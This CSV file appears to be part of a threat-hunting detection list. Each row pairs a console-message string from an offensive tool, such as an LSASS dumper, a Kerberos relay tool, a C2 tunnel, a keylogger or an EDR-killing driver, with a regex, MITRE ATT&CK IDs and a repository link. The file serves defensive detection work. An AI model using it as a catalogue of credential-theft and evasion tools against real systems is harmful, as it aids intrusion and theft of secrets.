"*[!] Dont forget about adding your attack in AcceptSecurityContext(*",".{0,1000}\[!\]\sDont\sforget\sabout\sadding\syour\sattack\sin\sAcceptSecurityContext\(.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#content","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","12904"
"*[!] Dumping LSASS Requires Elevated Priviledges!*",".{0,1000}\[!\]\sDumping\sLSASS\sRequires\sElevated\sPriviledges!.{0,1000}","offensive_tool_keyword","DumpLSASS","Lsass dumping tool - 50 ways of dumping lsass","T1003.001 - T1055.001 - T1620","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/elementalsouls/DumpLSASS","1","0","#content","N/A","10","1","33","5","2024-02-27T11:25:11Z","2023-04-09T12:11:10Z","12905"
"*[!] Dumping LSASS Requires Elevated Priviledges!*",".{0,1000}\[!\]\sDumping\sLSASS\sRequires\sElevated\sPriviledges!.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","#content","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","12906"
"*[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option*",".{0,1000}\[!\]\sDumping\sthe\sntds\scan\scrash\sthe\sDC\son\sWindows\sServer\s2019\.\sUse\sthe\soption.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#content","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","12907"
"*[!] Dynamic Sink: BAD"", L""Harness""*",".{0,1000}\[!\]\sDynamic\sSink\:\sBAD\"",\sL\""Harness\"".{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","#content","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","12908"
"*[!] Elevated process spawned!*",".{0,1000}\[!\]\sElevated\sprocess\sspawned!.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","0","#content","N/A","10","7","614","69","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z","12909"
"*[!] ESTSAUTHPERSISTENT cookie was empty!*",".{0,1000}\[!\]\sESTSAUTHPERSISTENT\scookie\swas\sempty!.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","#content","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","12910"
"*[!] Failed to  build gtunnel server *",".{0,1000}\[!\]\sFailed\sto\s\sbuild\sgtunnel\sserver\s.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#content","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","12911"
"*[!] Failed to create gtunnel-server *",".{0,1000}\[!\]\sFailed\sto\screate\sgtunnel\-server\s.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#content","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","12912"
"*[!] Failed to create minidump*",".{0,1000}\[!\]\sFailed\sto\screate\sminidump.{0,1000}","offensive_tool_keyword","ATPMiniDump","Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft. Take a look at this blog post for details. ATPMiniDump was created starting from Outflank-Dumpert then big credits to @Cneelis","T1003 - T1005 - T1055 - T1218","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/b4rtik/ATPMiniDump","1","0","#content","N/A","N/A","3","255","46","2019-12-02T15:01:22Z","2019-11-29T19:49:54Z","12913"
"*[!] Failed to Create Process to Dump SAM*",".{0,1000}\[!\]\sFailed\sto\sCreate\sProcess\sto\sDump\sSAM.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","#content","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","12914"
"*[!] Failed to delete Performance registry key.*",".{0,1000}\[!\]\sFailed\sto\sdelete\sPerformance\sregistry\skey\..{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","#content","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","12915"
"*[!] Failed to download legitimate GPO from SYSVOL (dc_ip:*",".{0,1000}\[!\]\sFailed\sto\sdownload\slegitimate\sGPO\sfrom\sSYSVOL\s\(dc_ip\:.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","#content","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","12916"
"*[!] Failed to enumerate ADCS data.*",".{0,1000}\[!\]\sFailed\sto\senumerate\sADCS\sdata\..{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","#content","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","12917"
"*[!] Failed to exfiltrate using RoadTools auth file*",".{0,1000}\[!\]\sFailed\sto\sexfiltrate\susing\sRoadTools\sauth\sfile.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","#content","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","12918"
"*[!] Failed to fake NtOpenProcess on LSASS PID*",".{0,1000}\[!\]\sFailed\sto\sfake\sNtOpenProcess\son\sLSASS\sPID.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","#content","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","12919"
"*[!] Failed to get LSASS handle, bailing!*",".{0,1000}\[!\]\sFailed\sto\sget\sLSASS\shandle,\sbailing!.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","#content","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","12920"
"*[!] Failed to get privileges when trying to gain SYSTEM*",".{0,1000}\[!\]\sFailed\sto\sget\sprivileges\swhen\strying\sto\sgain\sSYSTEM.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003  - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","#content","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","12921"
"*[!] Failed to Kill EventLog Service*",".{0,1000}\[!\]\sFailed\sto\sKill\sEventLog\sService.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","#content","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","12922"
"*[!] Failed to load shellcode into memory*",".{0,1000}\[!\]\sFailed\sto\sload\sshellcode\sinto\smemory.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","#content","N/A","10","10","103","10","2025-03-27T12:47:34Z","2024-04-11T12:17:22Z","12923"
"*[!] Failed to Locate LSASS Dump File!*",".{0,1000}\[!\]\sFailed\sto\sLocate\sLSASS\sDump\sFile!.{0,1000}","offensive_tool_keyword","DumpLSASS","Lsass dumping tool - 50 ways of dumping lsass","T1003.001 - T1055.001 - T1620","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/elementalsouls/DumpLSASS","1","0","#content","N/A","10","1","33","5","2024-02-27T11:25:11Z","2023-04-09T12:11:10Z","12924"
"*[!] Failed to parse RoadTools auth JSON file*",".{0,1000}\[!\]\sFailed\sto\sparse\sRoadTools\sauth\sJSON\sfile.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","#content","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","12925"
"*[!] Failed to Transfer LSASS Dump*",".{0,1000}\[!\]\sFailed\sto\sTransfer\sLSASS\sDump.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","#content","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","12926"
"*[!] Failed to write malicious scheduled task to downloaded GPO. Exiting*",".{0,1000}\[!\]\sFailed\sto\swrite\smalicious\sscheduled\stask\sto\sdownloaded\sGPO\.\sExiting.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","#content","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","12927"
"*[!] Feature is unsupported for PS1 rats*",".{0,1000}\[!\]\sFeature\sis\sunsupported\sfor\sPS1\srats.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","#content","N/A","10","1","N/A","N/A","N/A","N/A","12928"
"*[!] Found exploitable sgid binary*",".{0,1000}\[!\]\sFound\sexploitable\ssgid\sbinary.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","#content","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","12929"
"*[!] Found exploitable Sudo NOPASSWD binary*",".{0,1000}\[!\]\sFound\sexploitable\sSudo\sNOPASSWD\sbinary.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","#content #linux","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","12930"
"*[!] Found exploitable suid binary*",".{0,1000}\[!\]\sFound\sexploitable\ssuid\sbinary.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","#content","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","12931"
"*[!] gClient with uuid: *",".{0,1000}\[!\]\sgClient\swith\suuid\:\s.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#content","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","12932"
"*[!] Holy handle leak Batman, we have a SYSTEM shell!!*",".{0,1000}\[!\]\sHoly\shandle\sleak\sBatman,\swe\shave\sa\sSYSTEM\sshell!!.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","12933"
"*[!] HTTP reflected DCOM authentication failed *",".{0,1000}\[!\]\sHTTP\sreflected\sDCOM\sauthentication\sfailed\s.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","#content","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","12934"
"*[!] I will dump all computer passwords*",".{0,1000}\[!\]\sI\swill\sdump\sall\scomputer\spasswords.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#content","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","12935"
"*[!] inject dll into log process failure *",".{0,1000}\[!\]\sinject\sdll\sinto\slog\sprocess\sfailure\s.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","#content","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","12936"
"*[!] In-memory LSASS dump method failed: *",".{0,1000}\[!\]\sIn\-memory\sLSASS\sdump\smethod\sfailed\:\s.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#content","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","12937"
"*[!] Insecure resource delegations found. Exporting report:*",".{0,1000}\[!\]\sInsecure\sresource\sdelegations\sfound\.\sExporting\sreport\:.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","#content","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","12938"
"*[!] Insecure trustee delegations found. Exporting report: *",".{0,1000}\[!\]\sInsecure\strustee\sdelegations\sfound\.\sExporting\sreport\:\s.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","#content","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","12939"
"*[!] Invalid Exfil Method Chosen! Data Will Not Be Sent!*",".{0,1000}\[!\]\sInvalid\sExfil\sMethod\sChosen!\sData\sWill\sNot\sBe\sSent!.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","#content","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","12940"
"*[!] Invalid sandbox evasion technique provided!*",".{0,1000}\[!\]\sInvalid\ssandbox\sevasion\stechnique\sprovided!.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#content","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","12941"
"*[!] Invalid sandbox evasion technique provided!*",".{0,1000}\[!\]\sInvalid\ssandbox\sevasion\stechnique\sprovided!.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","12942"
"*[!] It was not possible to retrieve GPO Policies*",".{0,1000}\[!\]\sIt\swas\snot\spossible\sto\sretrieve\sGPO\sPolicies.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#content","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","12943"
"*[!] Looks like Victim * doesn't have office365 Licence!*",".{0,1000}\[!\]\sLooks\slike\sVictim\s.{0,1000}\sdoesn\'t\shave\soffice365\sLicence!.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","#content","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","12944"
"*[!] Lsass dump created!*",".{0,1000}\[!\]\sLsass\sdump\screated!.{0,1000}","offensive_tool_keyword","Dumpy","Reuse open handles to dynamically dump LSASS","T1003.001 - T1055.001 - T1083","TA0006","N/A","N/A","Credential Access","https://github.com/Kudaes/Dumpy","1","0","#content","N/A","10","3","243","24","2024-04-04T07:42:26Z","2021-10-13T21:54:59Z","12945"
"*[!] LSASS dump failed *",".{0,1000}\[!\]\sLSASS\sdump\sfailed\s.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#content","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","12946"
"*[!] Modifialbe scheduled tasks were not evaluated due to permissions*",".{0,1000}\[!\]\sModifialbe\sscheduled\stasks\swere\snot\sevaluated\sdue\sto\spermissions.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","#content","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","12947"
"*[!] Nim and C# are the only language capable of executing BOFS*",".{0,1000}\[!\]\sNim\sand\sC\#\sare\sthe\sonly\slanguage\scapable\sof\sexecuting\sBOFS.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","#content","N/A","10","1","N/A","N/A","N/A","N/A","12948"
"*[!] Password spraying will be conducted*",".{0,1000}\[!\]\sPassword\sspraying\swill\sbe\sconducted.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","#content","N/A","10","1","65","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z","12949"
"*[!] Please save this key as it will be required to decrypt the keylogs from the target!*",".{0,1000}\[!\]\sPlease\ssave\sthis\skey\sas\sit\swill\sbe\srequired\sto\sdecrypt\sthe\skeylogs\sfrom\sthe\starget!.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","#content","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","12950"
"*[!] Please specify smb attack keyword --smbkeyword *",".{0,1000}\[!\]\sPlease\sspecify\ssmb\sattack\skeyword\s\-\-smbkeyword\s.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#content","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","12951"
"*[!] Press any key to stop driver and clean up all POC files to avoid detection !*",".{0,1000}\[!\]\sPress\sany\skey\sto\sstop\sdriver\sand\sclean\sup\sall\sPOC\sfiles\sto\savoid\sdetection\s!.{0,1000}","offensive_tool_keyword","BadRentdrv2","A vulnerable driver (BYOVD) capable of terminating several EDRs and antivirus software","T1562 - T1068 - T1210 - T1489 - T1496","TA0005 - TA0004 - TA0040","N/A","Agrius","Defense Evasion","https://github.com/keowu/BadRentdrv2","1","0","#content","N/A","10","1","95","20","2024-12-26T13:43:18Z","2023-10-01T18:24:38Z","12952"
"*[!] PRESS TO EXECUTE SHELLCODED EXE*",".{0,1000}\[!\]\sPRESS\sTO\sEXECUTE\sSHELLCODED\sEXE.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","#content","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","12953"
"*[!] Rasman service is not running!*",".{0,1000}\[!\]\sRasman\sservice\sis\snot\srunning!.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","#content","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","12954"
"*[!] Setting Up C&C Module*",".{0,1000}\[!\]\sSetting\sUp\sC\&C\sModule.{0,1000}","offensive_tool_keyword","Aoyama ","Python Botnet ","T1059 - T1219 - T1090 - T1102 - T1213 - T1095 - T1071 - T1486 - T1083 - T1041 - T1012 - T1027","TA0011 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/Leeon123/Aoyama","1","0","#content","N/A","10","10","260","63","2022-03-23T09:49:43Z","2019-07-16T13:04:07Z","12955"
"*[!] SharpSCCM must be run with local administrator privileges to retrieve policy secret blobs*",".{0,1000}\[!\]\sSharpSCCM\smust\sbe\srun\swith\slocal\sadministrator\sprivileges\sto\sretrieve\spolicy\ssecret\sblobs.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpSCCM","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","12956"
"*[!] SharpSCCM must be run with local administrator privileges to retrieve policy secret blobs*",".{0,1000}\[!\]\sSharpSCCM\smust\sbe\srun\swith\slocal\sadministrator\sprivileges\sto\sretrieve\spolicy\ssecret\sblobs.{0,1000}","offensive_tool_keyword","SharpSCCM","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpSCCM","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","12957"
"*[!] Shellcoded PE\'s size: *",".{0,1000}\[!\]\sShellcoded\sPE\\\'s\ssize\:\s.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","#content","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","12958"
"*[!] SMB reflected DCOM authentication failed*",".{0,1000}\[!\]\sSMB\sreflected\sDCOM\sauthentication\sfailed.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","#content","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","12959"
